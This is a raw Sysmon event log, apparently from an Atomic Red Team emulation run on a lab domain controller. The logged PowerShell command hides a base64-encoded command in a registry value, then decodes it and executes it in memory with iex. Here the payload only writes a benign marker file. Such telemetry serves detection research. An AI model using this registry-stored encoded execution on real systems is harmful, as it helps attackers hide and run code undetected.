\""$env:SystemRoot/Temp/art-marker.txt\"" -value \""Hello from the Atomic Red Team\""\"" reg.exe add \""HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam\"" /v ART /t REG_SZ /d \""U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=\"" iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))} 10341000x80000000000000002247054Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.937{05ADC7E1-229F-6039-1600-00000000AD01}154011112C:\Windows\system32\svchost.exe{05ADC7E1-6EB6-603E-15AB-00000000AD01}6676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247053Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.937{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6EB6-603E-15AB-00000000AD01}6676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247052Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.888{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6EB6-603E-15AB-00000000AD01}6676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247051Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.888{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6EB6-603E-15AB-00000000AD01}6676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002247050Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:58:30.877{05ADC7E1-6EB6-603E-15AB-00000000AD01}6676\PSHost.132591779107898408.6676.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002247049Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.858{05ADC7E1-6EB6-603E-15AB-00000000AD01}6676ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_2rvg0qq2.usv.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247048Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.858{05ADC7E1-6EB6-603E-15AB-00000000AD01}6676ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_3esa4t5a.xny.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002247047Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.843{05ADC7E1-6EB6-603E-15AB-00000000AD01}6676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_3esa4t5a.xny.ps12021-03-02 16:58:30.843 10341000x80000000000000002247046Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.827{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-6EB6-603E-15AB-00000000AD01}6676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247045Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.788{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6EB6-603E-15AB-00000000AD01}6676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247044Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.788{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6EB6-603E-15AB-00000000AD01}6676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF829F94433) 10341000x80000000000000002247043Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.788{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247042Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.788{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247041Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.788{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247040Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.788{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247039Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.788{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6EB6-603E-15AB-00000000AD01}6676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002247038Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.788{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6EB6-603E-15AB-00000000AD01}6676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3743(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b35b7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f535de3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4ac19f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65392(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4a82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4e1471(wow64) 154100x80000000000000002247037Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.789{05ADC7E1-6EB6-603E-15AB-00000000AD01}6676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {# Encoded payload in next command is the following \""Set-Content -path \""$env:SystemRoot/Temp/art-marker.txt\"" -value \""Hello from the Atomic Red Team\""\"" reg.exe add \""HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam\"" /v ART /t REG_SZ /d \""U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=\"" iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))} C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000002247036Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.788{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-02 16:56:11.776 11241100x80000000000000002247035Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.787{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-02 16:56:11.773 23542300x80000000000000002247034Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.733{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-out.txtMD5=D3894BCAE693F1BEA8F5DA4BD24090FD,SHA256=1E436416CB03B75053408CD524FDEF2B65031E9752A1BD1BB74F0A0F25A7EE33,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002247033Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.671{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002247032Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.671{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002247031Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.671{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002247030Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.671{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002247029Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.671{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002247028Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 